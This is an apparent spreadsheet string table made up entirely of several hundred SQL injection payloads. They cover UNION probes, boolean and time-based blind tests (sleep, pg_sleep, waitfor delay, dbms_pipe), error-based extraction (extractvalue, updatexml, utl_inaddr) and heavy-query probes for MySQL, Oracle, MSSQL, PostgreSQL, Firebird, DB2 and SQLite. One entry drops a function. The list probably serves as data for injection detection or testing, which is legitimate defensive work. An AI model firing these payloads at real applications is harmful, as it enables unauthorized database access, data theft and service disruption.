  <si>
    <t>1%"  )  )   )  and 1594 = 8757</t>
  </si>
  <si>
    <t>-4413%'  )  )   union all select 1345,1345#</t>
  </si>
  <si>
    <t>1 )  where 8474 = 8474 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'ptfi' from dual where 2234 = 2234 and 2006 = 2006</t>
  </si>
  <si>
    <t>1  )  )   as klmm where 3107 = 3107</t>
  </si>
  <si>
    <t>1"  )  )   as upvg where 4826 = 4826</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 'uzmy' like 'uzmy</t>
  </si>
  <si>
    <t>-4756"  )  )   union all select 6846,6846,6846,6846,6846,6846,6846#</t>
  </si>
  <si>
    <t>-7125" or  ( 8919 = 2275 ) *2275 and "fbwo" = "fbwo</t>
  </si>
  <si>
    <t>-8233' or 9538 = 1882#</t>
  </si>
  <si>
    <t>-3209'+ ( select ldum where 9912 = 9912 union all select 9912,9912,9912,9912#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and '%' = '</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  "rtyu" like "rtyu</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>-9630%" union all select 8592,8592,8592,8592--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 7822 = 4430 )  then 7822 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  'fnna' = 'fnna</t>
  </si>
  <si>
    <t>1%' or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-9762 )  or elt ( 5773 = 8986,8986 ) </t>
  </si>
  <si>
    <t>-8143 union all select 4492,4492,4492,4492,4492,4492,4492,4492,4492#</t>
  </si>
  <si>
    <t>1%" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select nash where 4159 = 4159 union all select null#</t>
  </si>
  <si>
    <t>1 )  as ktfu where 2637 = 2637</t>
  </si>
  <si>
    <t>-1333"  )  )   union all select 2376,2376,2376,2376,2376,2376,2376,2376,2376--</t>
  </si>
  <si>
    <t>1' )  where 8128 = 8128</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select * from generate_series ( 6730,6730,case when  ( 6730 = 9431 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'abjv' from dual where 4200 = 4200</t>
  </si>
  <si>
    <t>1 )  where 1487 = 1487</t>
  </si>
  <si>
    <t>1" )  as yzny where 4869 = 4869 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>-6039%'  )  )   or 6872 = 6872 and   (  (  '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5586 = 6403 )  then 1 else 5586* ( select 5586 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1  )  )   as pxmz where 2596 = 2596</t>
  </si>
  <si>
    <t>-8203  )  )   as eqlf where 6132 = 6132 union all select 6132,6132,6132,6132,6132,6132,6132,6132,6132--</t>
  </si>
  <si>
    <t>1" where 2072 = 2072 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" )  as ufai where 9673 = 9673</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 'cixa' like 'cixa</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as bvij where 7913 = 7913</t>
  </si>
  <si>
    <t>select  ( case when  ( 2501 = 4688 )  then 2501 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' )  where 6328 = 6328 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 3677 = 2193 )  then 3677 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1"  )  )   as rrms where 8185 = 8185 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1"  )  )   as lslk where 6729 = 6729 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( 'vnfi' = 'vnfi</t>
  </si>
  <si>
    <t>-9638  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 3679 = 3679</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select  ( case when  ( 5856 = 7176 )  then 5856 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'gmvk' like 'gmvk</t>
  </si>
  <si>
    <t>1%' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 where 1656 = 1656 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'nczi' = 'nczi</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  "uidb" like "uidb</t>
  </si>
  <si>
    <t>-5817' in boolean mode )  union all select 2391,2391,2391,2391,2391--</t>
  </si>
  <si>
    <t>1'+ ( select zbyt where 4575 = 4575 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>1' )  as fkpn where 1100 = 1100</t>
  </si>
  <si>
    <t>-9864" )  or elt ( 5885 = 4936,4936 )  and  ( "bfbb" like "bfbb</t>
  </si>
  <si>
    <t>1 where 4091 = 4091</t>
  </si>
  <si>
    <t>select  ( case when  ( 3565 = 4053 )  then 3565 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'scwx' where 6591 = 6591 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) ||'</t>
  </si>
  <si>
    <t>1  )  )   as cvid where 4381 = 4381 union all select null,null--</t>
  </si>
  <si>
    <t>1%' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-9379 )  or make_set ( 9354 = 9354,7185 )  and  ( 9212 = 9212</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select 9100 =  ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "wile" like "wile</t>
  </si>
  <si>
    <t>-2325'  )  )   )  union all select 1442,1442,1442--</t>
  </si>
  <si>
    <t>1  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  5683 = 5683</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 ) -- gqkk</t>
  </si>
  <si>
    <t>-8709" or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>-9361"  )  )   union all select 3112#</t>
  </si>
  <si>
    <t>1  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 3332 = 3332</t>
  </si>
  <si>
    <t>1'|| ( select 'iuud' where 3687 = 3687</t>
  </si>
  <si>
    <t>select  ( case when  ( 1961 = 2048 )  then 1961 else 1961* ( select 1961 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%"  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1' )  as eyzk where 2489 = 2489 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1 )  as iuje where 1976 = 1976 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" )  where 9511 = 9511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</si>
  <si>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and 'aicu' = 'aicu</t>
  </si>
  <si>
    <t>1%' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'dhwt' = 'dhwt</t>
  </si>
  <si>
    <t>-9119" )  where 9237 = 9237 or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "%" = "</t>
  </si>
  <si>
    <t>1 )  where 9708 = 9708</t>
  </si>
  <si>
    <t>-9507%" union all select 3342,3342,3342,3342,3342#</t>
  </si>
  <si>
    <t>1"  )  )   as jsdc where 2748 = 2748</t>
  </si>
  <si>
    <t>1 )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 2160 = 2160</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1  )  )   as prxq where 4600 = 4600</t>
  </si>
  <si>
    <t>-5369' )  or 3208 = 6669#</t>
  </si>
  <si>
    <t>-1876'|| ( select 'itfc' from dual where 9584 = 9584 union all select 9584,9584,9584,9584,9584,9584,9584,9584--</t>
  </si>
  <si>
    <t>-9629'  )  )   )  union all select 3077,3077,3077,3077#</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or elt ( 6272 = 6272,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 'wnzv' = 'wnzv</t>
  </si>
  <si>
    <t>1' )  as jrwx where 6087 = 6087 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>-1606'|| ( select 'qbaa' where 3967 = 3967 union all select 3967,3967,3967,3967,3967--</t>
  </si>
  <si>
    <t>1'|| ( select 'nvrq' from dual where 4337 = 4337 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 'xmwj' = 'xmwj</t>
  </si>
  <si>
    <t>1%"  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 where 6965 = 6965 and elt ( 3933 = 1232,1232 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 1233 = 1233</t>
  </si>
  <si>
    <t>-2601' )  union all select 2866,2866,2866,2866,2866,2866--</t>
  </si>
  <si>
    <t>-1188  )  )   union all select 4711--</t>
  </si>
  <si>
    <t>1 )  as bpap where 7758 = 7758 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select vxax where 9036 = 9036 and elt ( 1210 = 1210,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>-4906'  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>1 where 6169 = 6169  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>-9370' )  where 7070 = 7070 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( "eakt" like "eakt</t>
  </si>
  <si>
    <t>if ( 6767 = 5022 )  select 6767 else drop function buii--</t>
  </si>
  <si>
    <t>1'+ ( select lptb where 3861 = 3861 or sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  rlike  ( select  ( case when  ( 7447 = 3981 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1' )  where 5540 = 5540 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1 )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   rlike  ( select  ( case when  ( 6094 = 7893 )  then 1 else 0x28 end  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'niro' = 'niro</t>
  </si>
  <si>
    <t>1'+ ( select vohg where 6383 = 6383 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1'|| ( select 'npel' from dual where 5258 = 5258</t>
  </si>
  <si>
    <t>1" )  as ymsc where 3694 = 3694 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'tzrd' = 'tzrd</t>
  </si>
  <si>
    <t>select  ( case when  ( 9696 = 2874 )  then 1 else 9696* ( select 9696 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 4675 = 4675</t>
  </si>
  <si>
    <t>1' where 7910 = 7910</t>
  </si>
  <si>
    <t>1'|| ( select 'mzhj' where 9677 = 9677 union all select null,null,null--</t>
  </si>
  <si>
    <t>-7889"  )  )   as oayf where 1765 = 1765 or 8571 = 8571--</t>
  </si>
  <si>
    <t>select * from generate_series ( 8147,8147,case when  ( 8147 = 6336 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1" where 9792 = 9792 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-8553'+ ( select adko where 1750 = 1750 union all select 1750#</t>
  </si>
  <si>
    <t>1'|| ( select 'djoe' from dual where 8063 = 8063  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1' )  where 9304 = 9304 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   as gqzy where 2312 = 2312 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 )  as duqb where 6495 = 6495</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7533 = 7533 and   (  (   ( 'txex' = 'txex</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'uwbh' = 'uwbh</t>
  </si>
  <si>
    <t>-8047' or 3038 = 3038</t>
  </si>
  <si>
    <t>-9977" where 5132 = 5132 union all select 5132--</t>
  </si>
  <si>
    <t>1 )  where 7978 = 7978 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and "arqb" like "arqb</t>
  </si>
  <si>
    <t>1'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 'ochr' like 'ochr</t>
  </si>
  <si>
    <t>-4644 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # upwd</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">-2951" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as svim where 4924 = 4924 and 7932 = 5870</t>
  </si>
  <si>
    <t>1" where 6004 = 6004</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) # usus</t>
  </si>
  <si>
    <t>1" )  where 2873 = 2873 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-5925 )  where 5758 = 5758 union all select 5758,5758,5758,5758,5758,5758,5758,5758,5758#</t>
  </si>
  <si>
    <t>1"  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9434" )  as cqlw where 1600 = 1600 or 2733 = 1047--</t>
  </si>
  <si>
    <t>1" )  where 2312 = 2312 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" where 4073 = 4073 rlike  ( select  ( case when  ( 8716 = 4281 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'xdce' = 'xdce</t>
  </si>
  <si>
    <t xml:space="preserve">1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">1'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) </t>
  </si>
  <si>
    <t>-6186' in boolean mode )  union all select 2990,2990,2990#</t>
  </si>
  <si>
    <t>1'|| ( select 'awba' from dual where 3749 = 3749 and 1445 = 3334--</t>
  </si>
  <si>
    <t>-3007 )  where 6648 = 6648 union all select 6648,6648,6648,6648,6648,6648,6648,6648#</t>
  </si>
  <si>
    <t>1' )  where 8628 = 8628 union all select null,null,null--</t>
  </si>
  <si>
    <t>1" )  as ranl where 5553 = 5553</t>
  </si>
  <si>
    <t>-2321%" )  or 2271 = 7683--</t>
  </si>
  <si>
    <t>-4325 order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( "sxih" = "sxih</t>
  </si>
  <si>
    <t>1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) -- ofqd</t>
  </si>
  <si>
    <t>1" )  where 5196 = 5196 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( 'dtym' = 'dtym</t>
  </si>
  <si>
    <t>-3775' )  as rqet where 7092 = 7092 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1' )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 8294 = 4332 )  then 1 else 8294* ( select 8294 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1 where 9869 = 9869 union all select null,null#</t>
  </si>
  <si>
    <t>-1393'  )  )   )  union all select 8280--</t>
  </si>
  <si>
    <t>1' )  as yxdb where 4597 = 4597</t>
  </si>
  <si>
    <t>-8357'  )  )   as henk where 8198 = 8198 or 2558 = 9103#</t>
  </si>
  <si>
    <t>1'|| ( select 'vwls' where 5252 = 5252 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-1989%'  )  )   or 6179 = 8518#</t>
  </si>
  <si>
    <t>1" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and "mynm" like "mynm</t>
  </si>
  <si>
    <t>-9698 )  as pvhn where 3223 = 3223 or elt ( 6563 = 9210,9210 ) --</t>
  </si>
  <si>
    <t>1 )  where 6720 = 6720 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
